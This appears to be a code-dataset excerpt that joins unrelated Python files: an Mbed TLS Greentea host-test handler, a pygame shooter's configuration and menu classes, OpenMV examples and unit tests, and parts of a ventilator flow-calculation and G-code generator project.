    finishes, the target sends back the result. This class handles the
    result event and prints the verdict in the form that Greentea understands.
"""
# status/error codes from suites/helpers.function
DEPENDENCY_SUPPORTED = 0
KEY_VALUE_MAPPING_FOUND = DEPENDENCY_SUPPORTED
DISPATCH_TEST_SUCCESS = DEPENDENCY_SUPPORTED
KEY_VALUE_MAPPING_NOT_FOUND = -1 # Expression Id not found.
DEPENDENCY_NOT_SUPPORTED = -2 # Dependency not supported.
DISPATCH_TEST_FN_NOT_FOUND = -3 # Test function not found.
DISPATCH_INVALID_TEST_DATA = -4 # Invalid parameter type.
DISPATCH_UNSUPPORTED_SUITE = -5 # Test suite not supported/enabled.
def __init__(self):
"""
Constructor initialises test index to 0.
"""
super(MbedTlsTest, self).__init__()
self.tests = []
self.test_index = -1
self.dep_index = 0
self.suite_passed = True
self.error_str = dict()
self.error_str[self.DEPENDENCY_SUPPORTED] = \
'DEPENDENCY_SUPPORTED'
self.error_str[self.KEY_VALUE_MAPPING_NOT_FOUND] = \
'KEY_VALUE_MAPPING_NOT_FOUND'
self.error_str[self.DEPENDENCY_NOT_SUPPORTED] = \
'DEPENDENCY_NOT_SUPPORTED'
self.error_str[self.DISPATCH_TEST_FN_NOT_FOUND] = \
'DISPATCH_TEST_FN_NOT_FOUND'
self.error_str[self.DISPATCH_INVALID_TEST_DATA] = \
'DISPATCH_INVALID_TEST_DATA'
self.error_str[self.DISPATCH_UNSUPPORTED_SUITE] = \
'DISPATCH_UNSUPPORTED_SUITE'
def setup(self):
"""
Setup hook implementation. Reads test suite data file and parses out
tests.
"""
binary_path = self.get_config_item('image_path')
script_dir = os.path.split(os.path.abspath(__file__))[0]
suite_name = os.path.splitext(os.path.basename(binary_path))[0]
data_file = ".".join((suite_name, 'datax'))
data_file = os.path.join(script_dir, '..', 'mbedtls',
suite_name, data_file)
if os.path.exists(data_file):
self.log("Running tests from %s" % data_file)
parser = TestDataParser()
parser.parse(data_file)
self.tests = parser.get_test_data()
self.print_test_info()
else:
self.log("Data file not found: %s" % data_file)
self.notify_complete(False)
def print_test_info(self):
"""
Prints test summary read by Greentea to detect test cases.
"""
self.log('{{__testcase_count;%d}}' % len(self.tests))
for name, _, _, _ in self.tests:
self.log('{{__testcase_name;%s}}' % name)
@staticmethod
def align_32bit(data_bytes):
"""
4 byte aligns input byte array.
:return:
"""
data_bytes += bytearray((4 - (len(data_bytes))) % 4)
@staticmethod
def hex_str_bytes(hex_str):
"""
Converts Hex string representation to byte array
:param hex_str: Hex in string format.
:return: Output Byte array
"""
if hex_str[0] != '"' or hex_str[len(hex_str) - 1] != '"':
raise TestDataParserError("HEX test parameter missing '\"':"
" %s" % hex_str)
hex_str = hex_str.strip('"')
if len(hex_str) % 2 != 0:
raise TestDataParserError("HEX parameter len should be mod of "
"2: %s" % hex_str)
data_bytes = binascii.unhexlify(hex_str)
return data_bytes
@staticmethod
def int32_to_big_endian_bytes(i):
"""
        Converts i to a byte array in big endian format.
:param i: Input integer
:return: Output bytes array in big endian or network order
"""
data_bytes = bytearray([((i >> x) & 0xff) for x in [24, 16, 8, 0]])
return data_bytes
def test_vector_to_bytes(self, function_id, dependencies, parameters):
"""
Converts test vector into a byte array that can be sent to the target.
:param function_id: Test Function Identifier
:param dependencies: Dependency list
:param parameters: Test function input parameters
:return: Byte array and its length
"""
data_bytes = bytearray([len(dependencies)])
if dependencies:
data_bytes += bytearray(dependencies)
data_bytes += bytearray([function_id, len(parameters)])
for typ, param in parameters:
if typ == 'int' or typ == 'exp':
i = int(param, 0)
data_bytes += b'I' if typ == 'int' else b'E'
self.align_32bit(data_bytes)
data_bytes += self.int32_to_big_endian_bytes(i)
elif typ == 'char*':
param = param.strip('"')
i = len(param) + 1 # + 1 for null termination
data_bytes += b'S'
self.align_32bit(data_bytes)
data_bytes += self.int32_to_big_endian_bytes(i)
data_bytes += bytearray(param, encoding='ascii')
data_bytes += b'\0' # Null terminate
elif typ == 'hex':
binary_data = self.hex_str_bytes(param)
data_bytes += b'H'
self.align_32bit(data_bytes)
i = len(binary_data)
data_bytes += self.int32_to_big_endian_bytes(i)
data_bytes += binary_data
length = self.int32_to_big_endian_bytes(len(data_bytes))
return data_bytes, length
def run_next_test(self):
"""
Fetch next test information and execute the test.
"""
self.test_index += 1
self.dep_index = 0
if self.test_index < len(self.tests):
name, function_id, dependencies, args = self.tests[self.test_index]
self.run_test(name, function_id, dependencies, args)
else:
self.notify_complete(self.suite_passed)
def run_test(self, name, function_id, dependencies, args):
"""
Execute the test on target by sending next test information.
:param name: Test name
:param function_id: function identifier
:param dependencies: Dependencies list
:param args: test parameters
:return:
"""
self.log("Running: %s" % name)
param_bytes, length = self.test_vector_to_bytes(function_id,
dependencies, args)
self.send_kv(''.join('{:02x}'.format(x) for x in length), ''.join('{:02x}'.format(x) for x in param_bytes))
@staticmethod
def get_result(value):
"""
Converts result from string type to integer
:param value: Result code in string
:return: Integer result code. Value is from the test status
constants defined under the MbedTlsTest class.
"""
try:
return int(value)
except ValueError:
ValueError("Result should return error number. "
"Instead received %s" % value)
@event_callback('GO')
def on_go(self, _key, _value, _timestamp):
"""
Sent by the target to start first test.
:param _key: Event key
:param _value: Value. ignored
:param _timestamp: Timestamp ignored.
:return:
"""
self.run_next_test()
@event_callback("R")
def on_result(self, _key, value, _timestamp):
"""
Handle result. Prints test start, finish required by Greentea
to detect test execution.
:param _key: Event key
        :param value: Test result code sent by the target.
:param _timestamp: Timestamp ignored.
:return:
"""
int_val = self.get_result(value)
name, _, _, _ = self.tests[self.test_index]
self.log('{{__testcase_start;%s}}' % name)
self.log('{{__testcase_finish;%s;%d;%d}}' % (name, int_val == 0,
int_val != 0))
if int_val != 0:
self.suite_passed = False
self.run_next_test()
@event_callback("F")
def on_failure(self, _key, value, _timestamp):
"""
Handles test execution failure. That means dependency not supported or
Test function not supported. Hence marking test as skipped.
:param _key: Event key
        :param value: Error code sent by the target.
:param _timestamp: Timestamp ignored.
:return:
"""
int_val = self.get_result(value)
if int_val in self.error_str:
err = self.error_str[int_val]
else:
err = 'Unknown error'
# For skip status, do not write {{__testcase_finish;...}}
self.log("Error: %s" % err)
self.run_next_test()
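# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the upstream script): how the static
# helpers above encode values for the target. It only runs when this module
# is executed directly and mbed_host_tests is importable.
if __name__ == '__main__':
    raw = MbedTlsTest.int32_to_big_endian_bytes(0x1A2B)
    print(' '.join('{:02x}'.format(b) for b in raw))    # 00 00 1a 2b
    blob = MbedTlsTest.hex_str_bytes('"DEADBEEF"')
    print(len(blob), binascii.hexlify(blob))            # 4 b'deadbeef'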
``` |
{
"source": "jibminJung/2021-2-OSSProj-PlusAlpha-9",
"score": 3
} |
#### File: 2021-2-OSSProj-PlusAlpha-9/data/Defs.py
```python
import enum
import math
from sys import version
class Images(enum.Enum):
start = "./Image/StartImage.png"
how_to_play = "./Image/howtoplay.png"
about = "./Image/AboutPage.jpg"
background_desert = "./Image/DESERT_modified_v3.jpg"
background_antarctic = "./Image/Antarctic_modified_v2.jpg"
enemy_scrophion = "./Image/scorphion1-1.png"
enemy_cactus = "./Image/Catus.png"
missile_missile2 = "./Image/MISSILE_2.png"
weapon_target_missile = "./Image/Weapon/spaceMissiles_012.png"
info_infi_1 = "./Image/Info_infi_1.png"
info_infi_2 = "./Image/Info_infi_2.png"
info_infi_3 = "./Image/Info_infi_3.png"
info_infi_4 = "./Image/Info_infi_4.png"
info_infi_5 = "./Image/Info_infi_5.png"
info_stage_1 = "./Image/Info_stage_1.png"
info_stage_2 = "./Image/Info_stage_2.png"
info_stage_3 = "./Image/Info_stage_3.png"
info_stage_4 = "./Image/Info_stage_4.png"
info_stage_5 = "./Image/Info_stage_5.png"
info_stage_6 = "./Image/Info_stage_6.png"
info_items = "./Image/Info_items.png"
info_controls = "./Image/Info_controls.jpg"
class Scales(enum.Enum):
default = (1, 1)
small = (.6, .6)
tiny = (.3, .3)
class Color(enum.Enum):
RED = (200,60,50)
BLUE = (0,60,200)
GREEN = (50,200,50)
YELLOW = (255,255,0)
WHITE = (255,255,255)
TRANSPARENT = (255,255,255,128)
GRAY = (220,220,220)
BLACK = (0,0,0)
class Default(enum.Enum):
game = {
"size": {
"x":0,
"y":0
}
}
sound = {
"sfx":{
"volume":0.2
}
}
font = "./Font/DXHanlgrumStd-Regular.otf"
character = {
"size": {
"x":100,
"y":100
},
"invincible_period": 4.0,
"missile":{
"min":1,
"max":4,
"speed":20,
"speed_inc":1
},
"max_stats":{
"power":500,
"fire_rate":0.3,
"mobility":25
}
}
item = {
"duration":10.0,
"size":{
"x":50,
"y":50
},
"sound": "./Sound/Item/speedup.wav",
"velocity":5,
"speedup":{
"spawn_rate": 0.004,
"frames":[
"./Image/Items/SpeedUp/frame-1.png",
"./Image/Items/SpeedUp/frame-2.png",
"./Image/Items/SpeedUp/frame-3.png",
"./Image/Items/SpeedUp/frame-4.png",
"./Image/Items/SpeedUp/frame-5.png",
"./Image/Items/SpeedUp/frame-1.png"
]
},
"powerup":{
"spawn_rate": 0.004,
"duration":10.0,
"frames":[
"./Image/Items/PowerUp/frame-1.png",
"./Image/Items/PowerUp/frame-2.png",
"./Image/Items/PowerUp/frame-3.png",
"./Image/Items/PowerUp/frame-4.png",
"./Image/Items/PowerUp/frame-5.png",
"./Image/Items/PowerUp/frame-1.png"
]
},
"bomb":{
"spawn_rate": 0.004,
"interval":1.0,
"power":1000,
"frames":[
"./Image/Items/Bomb/frame-1.png",
"./Image/Items/Bomb/frame-2.png",
"./Image/Items/Bomb/frame-3.png",
"./Image/Items/Bomb/frame-4.png",
"./Image/Items/Bomb/frame-5.png",
"./Image/Items/Bomb/frame-1.png"
]
},
"health":{
"spawn_rate": 0.002,
"frames":[
"./Image/Items/Health/frame-1.png",
"./Image/Items/Health/frame-2.png",
"./Image/Items/Health/frame-3.png",
"./Image/Items/Health/frame-4.png",
"./Image/Items/Health/frame-1.png"
]
},
"coin":{
"spawn_rate": 0.002,
"frames":[
"./Image/Items/Coin/frame-1.png",
"./Image/Items/Coin/frame-2.png",
"./Image/Items/Coin/frame-3.png",
"./Image/Items/Coin/frame-4.png",
"./Image/Items/Coin/frame-5.png",
"./Image/Items/Coin/frame-1.png"
]
}
}
effect = {
"speed": 0.4,
"velocity": 5,
"bomb":{
"duration": 7.0,
"size":{
"x": 500,
"y": 500
},
"frames": [
"./Image/Effects/Bomb/frame-1.png",
"./Image/Effects/Bomb/frame-2.png",
"./Image/Effects/Bomb/frame-3.png",
"./Image/Effects/Bomb/frame-4.png",
"./Image/Effects/Bomb/frame-5.png",
"./Image/Effects/Bomb/frame-6.png",
"./Image/Effects/Bomb/frame-7.png",
"./Image/Effects/Bomb/frame-8.png",
"./Image/Effects/Bomb/frame-9.png",
"./Image/Effects/Bomb/frame-10.png",
"./Image/Effects/Bomb/frame-11.png",
"./Image/Effects/Bomb/frame-12.png",
"./Image/Effects/Bomb/frame-13.png",
"./Image/Effects/Bomb/frame-14.png",
"./Image/Effects/Bomb/frame-15.png"
],
"sound": "./Sound/Weapon/explosion.wav"
},
"boom":{
"duration": 4.0,
"size":{
"x": 150,
"y": 150
},
"frames":[
"./Image/Effects/Boom/frame-1.png",
"./Image/Effects/Boom/frame-2.png",
"./Image/Effects/Boom/frame-3.png",
"./Image/Effects/Boom/frame-4.png",
"./Image/Effects/Boom/frame-5.png",
"./Image/Effects/Boom/frame-6.png",
],
"sound": "./Sound/destroyed.wav"
},
"crosshair":{
"image": "./Image/Effects/Crosshair.png",
"size": {
"x": 120,
"y": 120
},
"velocity": 5
}
}
animation = {
"blink":{
"speed":0.05,
"frame":0.2,
"duration":4.0
},
"interval":10.0,
"speed":0.5
}
about = {
"authors": [
"<NAME>",
"<NAME>",
"<NAME>",
],
"open_source": {
"IMAGES":{
"MillionthVector CC BY 4.0": "http://millionthvector.blogspot.com/p/free-sprites.html",
"You're Perfect Studio CC0 1.0":"https://opengameart.org/content/space-shoter-crosshairs",
"bevouliin.com CC0 1.0":"https://opengameart.org/content/shining-coin-shining-health-shining-power-up-sprite-sheets",
"Felis Chaus CC0 1.0":"https://opengameart.org/content/fire-explosion",
"9KeyStudio CC0 1.0":"https://opengameart.org/content/pixel-art-explosion-animation",
"Icons made by Freepik":'https://www.freepik.com',
"Flaticon":"https://www.flaticon.com/"
},
"SOUNDS":{
"MATRIXXX_ CC0 1.0": "https://freesound.org/people/MATRIXXX_/sounds/441373/",
"simoneyoh3998 CC0 1.0": "https://freesound.org/people/simoneyoh3998/sounds/500673/",
"jalastram CC BY 3.0": "https://freesound.org/people/jalastram/sounds/317769/",
"befig CC BY 3.0": "https://freesound.org/people/befig/sounds/455530/",
"Royalty Free Music from Bensound":"www.bensound.com"
},
"BASE CODE":{
"CSID-DGU/2021-1-OSSPC-MUHIRYO-4":"https://github.com/CSID-DGU/2021-1-OSSPC-MUHIRYO-4.git",
"TimurKhayrullin/Ultimate-Antivirus":"https://github.com/TimurKhayrullin/Ultimate-Antivirus"
}
}
}
class Utils():
@classmethod
def clamp(cls, val, n_min, n_max):
return max(n_min, min(val, n_max))
@classmethod
def get_distance(cls, a, b):
return math.sqrt((b["x"] - a["x"])**2 + (b["y"] - a["y"])**2)
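# Illustrative sketch (not part of the original file): the helpers above work
# on plain numbers and on the {"x": ..., "y": ...} position dicts used here.
if __name__ == "__main__":
    print(Utils.clamp(120, 0, 100))                                  # 100
    print(Utils.get_distance({"x": 0, "y": 0}, {"x": 3, "y": 4}))    # 5.0
    print(Default.character.value["missile"]["speed"])               # 20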
```
#### File: 2021-2-OSSProj-PlusAlpha-9/menu/DifficultySelectMenu.py
```python
import pygame
import pygame_menu
from game.InfiniteGame import *
from pygame_menu.utils import make_surface
from menu.CharacterSelectMenu import *
class DifficultySelectMenu:
def __init__(self,screen):
        # Receive the screen and read its size
self.screen = screen
self.size = screen.get_size()
menu_image = pygame_menu.baseimage.BaseImage(image_path='./Image/StartImage.png',drawing_mode=pygame_menu.baseimage.IMAGE_MODE_FILL)
mytheme = pygame_menu.themes.THEME_ORANGE.copy()
mytheme.background_color = menu_image
self.menu = pygame_menu.Menu('Select Difficulty...', self.size[0], self.size[1],
theme=mytheme)
def to_menu(self):
self.menu.disable()
    # Build the menu and show it
def show(self):
        # Build the difficulty selection menu
mode = [("EASY",InfiniteGame.EasyMode()),("HARD",InfiniteGame.HardMode())]
self.mode_selector = self.menu.add.selector(
title='Difficulty :\t',
items=mode
)
self.mode_selector.add_self_to_kwargs() # Callbacks will receive widget as parameter
self.menu.add.button("Character Select ->",self.to_character_select_menu)
self.menu.add.button("BACK",self.to_menu)
self.menu.mainloop(self.screen, self.check_resize)
    def to_character_select_menu(self):  # starts the character select menu
selected_mode = self.mode_selector.get_value()[0][1]
CharacterSelectMenu(self.screen,selected_mode).show()
    # Called on every iteration of the menu mainloop
def check_resize(self):
        if (self.size != self.screen.get_size()):  # compare current and stored sizes; update if they differ
            changed_screen_size = self.screen.get_size()  # the new size
            ratio_screen_size = (changed_screen_size[0],changed_screen_size[0]*783/720)  # compute y proportionally to x
            if(ratio_screen_size[0]<320):  # minimum x length limit
                ratio_screen_size = (494,537)
            if(ratio_screen_size[1]>783):  # maximum y length limit
ratio_screen_size = (720,783)
self.screen = pygame.display.set_mode(ratio_screen_size,
pygame.RESIZABLE)
window_size = self.screen.get_size()
new_w, new_h = 1 * window_size[0], 1 * window_size[1]
self.menu.resize(new_w, new_h)
self.menu.get_current().resize(new_w, new_h)
self.size = window_size
self.menu._current._widgets_surface = make_surface(0,0)
print(f'New menu size: {self.menu.get_size()}')
```
#### File: 2021-2-OSSProj-PlusAlpha-9/object/Effect.py
```python
import time
import pygame
from data.Defs import *
from object.Object import Object
class Effect(Object):
    # All effects inherit from this class
    # Attributes:
    #   occurred : time at which the effect started (float)
    #   inc : time elapsed toward the next animation frame (float)
    #   anim_speed : frame transition speed (float)
def __init__(self, frames, frames_trans, size, velocity, anim_id):
super().__init__("", size, velocity, frames, frames_trans, anim_id)
self.occurred = time.time()
self.inc = 0.0
self.anim_speed = Default.effect.value["speed"]
    # Move the effect across the screen and advance to the next animation frame
def move(self, game):
if (game.size[0] != self.boundary[0]) or (game.size[1] != self.boundary[1]):
self.on_resize(game)
self.y += self.velocity
self.inc += self.anim_speed
self.inc = Utils.clamp(self.inc, 0.0, self.frame_count-1)
self.current_frame = int(self.inc)
self.img = self.frames[int(self.inc)]
self.update_rect((self.x, self.y))
class Explosion(Effect):
    # Explosion effect object
    # Attributes :
    #   duration : animation duration
def __init__(self, animation):
super().__init__(animation.frames, animation.frames_trans, Default.effect.value["bomb"]["size"], Default.effect.value["velocity"], "bomb_effect")
self.duration = Default.effect.value["bomb"]["duration"]
    # Damages enemies and the boss within the blast area
def move(self, game):
super().move(game)
        # Disappear once the animation has finished
if int(self.inc) >= self.frame_count-1:
game.effect_list.remove(self)
else:
            # Destroy any enemy that collides with the blast
for enemy in list(game.mobList):
if self.check_crash(enemy):
enemy.destroy(game)
game.score += 10
            # Remove boss projectiles that collide with the blast
if hasattr(game, "stage"):
if game.stage.is_boss_stage:
for bullet in game.enemyBullets:
if self.rect_collide(bullet.rect):
if bullet in game.enemyBullets:
game.enemyBullets.remove(bullet)
class Boom(Effect):
    # Enemy destruction effect
def __init__(self, animation):
super().__init__(animation.frames, animation.frames_trans, Default.effect.value["boom"]["size"], Default.effect.value["velocity"], "destroy_effect")
self.duration = Default.effect.value["boom"]["duration"]
    # Disappears once the animation has finished
def move(self, game):
super().move(game)
if int(self.inc) >= self.frame_count-1:
game.effect_list.remove(self)
``` |
{
"source": "jibonaronno/OpenMV-openmv",
"score": 4
} |
#### File: examples/02-Board-Control/timer_control.py
```python
import time
from pyb import Pin, Timer
def tick(timer): # we will receive the timer object when being called
print("Timer callback")
tim = Timer(4, freq=1) # create a timer object using timer 4 - trigger at 1Hz
tim.callback(tick) # set the callback to our tick function
while (True):
time.sleep(1000)
```
#### File: unittest/script/00-rgb_to_lab.py
```python
def unittest(data_path, temp_path):
import image
lab = image.rgb_to_lab((120, 200, 120))
return (lab[0] == 76 and lab[1] == -44 and lab[2] == 34)
```
#### File: unittest/script/01-lab_to_rgb.py
```python
def unittest(data_path, temp_path):
import image
rgb = image.lab_to_rgb((76, -44, 34))
return (rgb[0] == 118 and rgb[1] == 207 and rgb[2] == 122)
```
#### File: unittest/script/09-find_blobs.py
```python
def unittest(data_path, temp_path):
import image
thresholds = [(0, 100, 56, 95, 41, 74), # generic_red_thresholds
(0, 100, -128, -22, -128, 99), # generic_green_thresholds
(0, 100, -128, 98, -128, -16)] # generic_blue_thresholds
# Load image
img = image.Image("unittest/data/blobs.ppm", copy_to_fb=True)
blobs = img.find_blobs(thresholds, pixels_threshold=2000, area_threshold=200)
return blobs[0][0:-3] == (122, 41, 96, 81, 6228, 168, 82) and\
blobs[1][0:-3] == (44, 40, 77, 89, 5113, 80, 84) and\
blobs[2][0:-3] == (210, 40, 71, 82, 3890, 249, 76)
``` |
{
"source": "jibonaronno/Rhythm",
"score": 3
} |
#### File: jibonaronno/Rhythm/datalogger.py
```python
import sys
from os.path import join, dirname, abspath
from machinesetup import MachineSetup
import pprint
from backfeed import Backfeed
class DataLogger(object):
def __init__(self, filename="log6.txt"):
self.filename = filename
def writeBlock(self, datalist):
combined = ""
if len(datalist) > 0:
for data in datalist:
combined += data
with open(self.filename, "a+") as writer:
writer.write(combined)
'''
logger = DataLogger('log4.csv')
lData = []
def getStreamData(line):
if iCount < 10:
iCount += 1
if len(line > 15):
lData.append(line)
else:
iCount=0
logger.writeBlock(lData)
lData.clear()
if len(line > 15):
lData.append(line)
streamer = Backfeed('log2.txt')
streamer.setCallback(getStreamData)
streamer.StreamDirect()
#streamer.Start(1)
'''
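# Minimal standalone usage sketch (not part of the original file): DataLogger
# simply appends the concatenated strings to the given file.
if __name__ == "__main__":
    logger = DataLogger("demo_log.txt")
    logger.writeBlock(["line one\n", "line two\n"])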
```
#### File: jibonaronno/Rhythm/derivative.py
```python
import numpy
import matplotlib.pyplot as plott
import pprint
import math
def f(x):
return numpy.tan(x)
def f_diff(x):
return 1/numpy.cos(x)**2
def centered(x, h):
return (f(x+h) - f(x-h))/(2*h)
def forward(x, h):
return (f(x+h)-f(x))/h
def _forward(x, h):
return (math.sin(x+h)-math.sin(x))/h
x0 = 0.2
h_vector = [10**(-temp) for temp in numpy.arange(0, 17, 0.1)]
x_vector = [xvalue for xvalue in numpy.arange(0, numpy.pi, 0.1)]
sin_arr = numpy.zeros(len(x_vector))
deriv = numpy.zeros(len(x_vector))
deriv2 = numpy.zeros(len(x_vector))
for index, _sin in enumerate(x_vector):
sin_arr[index] = math.sin(_sin)
vector_len = len(sin_arr)
for index, _sin in enumerate(sin_arr):
if index < (vector_len - 1):
deriv[index] = forward(_sin, sin_arr[index+1])
deriv2[index] = _forward(x_vector[index], x_vector[index+1])
plott.plot(x_vector, sin_arr, label="_Sin_")
plott.plot(x_vector, deriv2, label="_Derivative")
#plott.loglog(x_vector, sin_arr, label="__Sin__")
'''
forward_res = numpy.zeros(len(h_vector))
centered_res = numpy.zeros(len(h_vector))
true_res = numpy.zeros(len(h_vector))
for index, _h in enumerate(h_vector):
forward_res[index] = forward(x0, _h)
centered_res[index] = centered(x0, _h)
true_res[index] = f_diff(x0)
x_array = [idx for idx in range(len(h_vector))]
x_arr = [idxx for idxx in numpy.arange(0, 17, 0.1)]
plott.figure(dpi=100)
#plott.loglog(x_array, true_res, label="true")
#plott.loglog(x_array, forward_res, label="Forward")
#plott.loglog(h_vector, abs(forward_res - true_res), label="Forward-true")
#plott.loglog(h_vector, abs(centered_res - true_res), label="Centered")
plott.loglog(x_arr, h_vector, label="h_vector")
'''
plott.grid()
plott.xlabel("h")
plott.ylabel("Absolute Difference")
plott.legend()
plott.show()
```
#### File: jibonaronno/Rhythm/flowprocess.py
```python
import math
import sys
from os.path import join, dirname, abspath
import json
import os
from flowsetup import JsonFlowSetup
import pprint
import math
from collections import deque
class FlowProcess(object):
def __init__(self):
self.sum_of_volume = 0.0
try:
config = JsonFlowSetup("flow.json")
self.D_inlet = float(config.dict["D_inlet"])
self.D_orifice = float(config.dict["D_orifice"])
self.P_air = float(config.dict["P_air"])
self.kcal = float(config.dict["kcal"])
self.diameter_ratio = self.D_orifice / self.D_inlet
self.orifice_area = (math.pi * (self.D_orifice * self.D_orifice)) / 4
self.inlet_area = (math.pi * (self.D_inlet * self.D_inlet)) / 4
self.CDD = self.orifice_area / self.inlet_area
self.Korifice = self.orifice_area * math.sqrt(2/(self.P_air * (1-(self.diameter_ratio ** 4)))) * self.kcal
except Exception as e:
print("error in flowprocess")
print(str(e))
self.flow = 0.0
def CalculateFlowConst(self, deltap):
if deltap < 0:
deltap = -deltap
return -math.sqrt((math.pi ** 2) * ((12 / 1000) ** 4) / 1.225 * 100 * deltap) * 1000
else:
return math.sqrt((math.pi ** 2) * ((12 / 1000) ** 4) / 1.225 * 100 * deltap) * 1000
def CalculateFlow(self, deltap):
result = 0.0
d_result = 0.0
try:
#if(deltap > 0):
if True:
#return self.CDD * self.Korifice * math.sqrt(deltap * 100)
result = (self.CDD ** 2) * (self.Korifice ** 2) * (deltap * 100)
if result > 0:
self.flow = math.sqrt(result)
self.Volume(self.flow)
return math.sqrt(result) * 60000
elif result < 0:
d_result = -result
self.flow = -math.sqrt(d_result)
self.Volume(self.flow)
return -math.sqrt(d_result) * 60000
else:
self.flow = 0.0
return 0.0
else:
return 0.0
except Exception as e:
print("Exception : flowprocess::CalculateFlow(...)")
print(str(e))
return self.flow
def sumofVolumes(self):
pass
flow_arr = deque()
sum_of_rmsVolume = 0.0
def rootVolume(self, flow):
rmsVolume = 0.0
self.flow_arr.append(flow)
if len(self.flow_arr) > 2:
self.flow_arr.popleft()
rmsVolume = math.sqrt((((self.flow_arr[0] + self.flow_arr[1]) / 2) ** 2) * 6.25)
if self.flow_arr[0] < 0:
self.sum_of_rmsVolume -= rmsVolume
else:
self.sum_of_rmsVolume += rmsVolume
return self.sum_of_rmsVolume
else:
return 0.0
def Volume(self, flow):
self.sum_of_volume += flow
return self.sum_of_volume
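# Illustrative sketch (not part of the original module): converting a
# differential-pressure reading into a signed flow value. CalculateFlow()
# additionally needs a valid flow.json (D_inlet, D_orifice, P_air, kcal).
if __name__ == "__main__":
    fp = FlowProcess()
    print(fp.CalculateFlowConst(2.5))     # positive delta gives a positive flow
    print(fp.CalculateFlowConst(-2.5))    # negative delta gives a negative flow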
```
#### File: jibonaronno/Rhythm/flowsetup.py
```python
import math
import sys
from os.path import join, dirname, abspath
import json
import os
class JsonFlowSetup(object):
def __init__(self , location):
self.location = os.path.expandvars(location)
self.load(self.location)
#pprint.pprint(self.db[r'Columns'])
def load(self , location):
if os.path.exists(location):
self._load()
else:
print("location missing")
self.dict = {}
return True
def dumptojson(self):
try:
json.dump(self.dict , open(self.location, "w+"))
return True
except:
return False
def _load(self):
self.dict = json.load(open(self.location , "r"))
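# Illustrative sketch (not part of the original module): flow.json is a flat
# JSON object; FlowProcess reads the keys shown below. The numeric values
# here are placeholders, not calibrated figures.
if __name__ == "__main__":
    sample = {"D_inlet": 0.019, "D_orifice": 0.012, "P_air": 1.225, "kcal": 1.0}
    json.dump(sample, open("flow.json", "w"))
    cfg = JsonFlowSetup("flow.json")
    print(cfg.dict["D_orifice"])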
```
#### File: jibonaronno/Rhythm/gcodegenerator.py
```python
import math
import sys
from os.path import join, dirname, abspath
from machinesetup import MachineSetup
import pprint
from jsonobject import JsonObject
class GcodeGenerator(object):
def __init__(self, vt, rr, ie, fio2, x_adj):
self.vtfactor = 1.0
self.vt = vt
self.rr = rr
self.ie = ie
self.fio2 = fio2
self.x_adj = x_adj
self.ACC=1000
self.xmax = 75 #60
self.xamb = 40 #12
self.xrect = 30
self.xcon_offset = 5
self.vtmax = 5000
self.gcodebipap = ""
self.bipapstep = 0
self.gcodebipap_back = ""
self.machinesetup = MachineSetup()
self.ACC = self.machinesetup.ACC
self.xmax = self.machinesetup.xmax
self.xamb = self.machinesetup.xamb
self.xrect = self.machinesetup.xrect
self.xcon_offset = self.machinesetup.xcon_offset
self.vtmax = self.machinesetup.vtmax
self.motor_i_min = self.machinesetup.motor_i_min
self.presmm = self.machinesetup.presmm
self.postsmm = self.machinesetup.postsmm
self.home_sense = self.machinesetup.home_sense
self.ipap_tol = self.machinesetup.ipap_tol
self.vol_tol = self.machinesetup.vol_tol
print(str(self.ACC) + "," + str(self.xmax) + "," + str(self.xamb) + "," + str(self.xrect) + "," + str(self.xcon_offset) + "," + str(self.vtmax))
self.calib_dict = {250:63.0, 300:68.0, 350:71.0, 400:73.0, 450:77.0, 500:86.0, 550:100.0}
#self.calib_dict = {250:103.0, 300:108.0, 350:111.0, 400:113.0, 450:125.0, 500:126.0, 550:140.0}
self.jsobj = ''
self.loadVtTable()
def loadVtTable(self):
try:
self.jsobj = JsonObject("vttable.json")
pprint.pprint(self.jsobj.dict)
except Exception as e:
print('Exception at loadVtTable : ' + str(e))
def getAxisdistanceFromIpap(self, pparr, ipap):
try:
if len(pparr) > 0:
for itm in pparr:
if ipap == int(float(itm[1])) or ipap < int(float(itm[1])):
return itm[0]
return -1
except Exception as e:
print("pospressure table is empty")
pprint.pprint(e)
return -1
def ComputeBipap(self, pparr, ipap):
xmax = 5
xmax = self.getAxisdistanceFromIpap(pparr, ipap)
print(f"Axis Distance :: {xmax}")
if xmax == -1:
self.ComputeCMV()
print("Failed ComputeBipap()")
else:
self.ComputeMotion(xmax)
print("ComputeMotion(xmax=" + str(xmax) + ") @ IPAP :: " + str(ipap) )
def ComputeMotion(self, xmax_bp):
self.Dt = self.xmax - self.xrect
self.xav = self.xrect * (self.vt / self.vtmax)
'''xav will come from table as below'''
self.xav = self.calib_dict[self.vt]
self.Dp = xmax_bp #self.Dt + self.xav
self.TDMS = 0
self.Kie = 1/self.ie
self.BCT = 60*(1-0.24) / self.rr
self.Ti = self.BCT / (1 + (1 / self.Kie))
self.Th = self.BCT - self.Ti
self.midpart_ti=(1-self.ACC*self.Ti*self.Ti)/2
self.lastpart_ti=self.xav*self.xav/4
self.identifier_ti=math.sqrt(self.midpart_ti*self.midpart_ti-4*self.lastpart_ti)
self.sol1_ti=(-1*self.midpart_ti+self.identifier_ti)/2
self.sol2_ti=(-1*self.midpart_ti-self.identifier_ti)/2
if self.sol1_ti>self.xav:
if self.sol2_ti>self.xav:
self.dsmall_ti=0.1
else:
self.dsmall_ti=self.sol2_ti
else:
self.dsmall_ti=self.sol1_ti
#print(self.identifier_ti)
self.midpart_th=(1-self.ACC*self.Th*self.Th)/2
self.lastpart_th=self.xav*self.xav/4
self.identifier_th=math.sqrt(self.midpart_th*self.midpart_th-4*self.lastpart_th)
self.sol1_th=(-1*self.midpart_th+self.identifier_th)/2
self.sol2_th=(-1*self.midpart_th-self.identifier_th)/2
if self.sol1_th>self.xav:
if self.sol2_th>self.xav:
self.dsmall_th=0.1
else:
self.dsmall_th=self.sol2_th
else:
self.dsmall_th=self.sol1_th
#self.ACC_inhale = (4 * self.xav) / (self.Ti * self.Ti)
#self.ACC_exhale = (4 * self.xav) / (self.Th * self.Th)
#self.Vi = self.ACC_inhale * (self.Ti / 2) * 60
#self.Vh = self.ACC_exhale * (self.Th / 2) * 60
self.vimax=math.sqrt(2*self.dsmall_ti*self.ACC)
self.vhmax=math.sqrt(2*self.dsmall_th*self.ACC)
self.ViAvg = self.vimax * 60
#print(self.ViAvg)
self.Vi = self.ViAvg
self.VhAvg = self.vhmax* 60
self.Vh = self.VhAvg
xavv = 0
def ComputeCMV(self):
self.xavv = self.x_adj
self.Dt = self.xmax - self.xrect
#self.xav = self.calib_dict[self.vt]
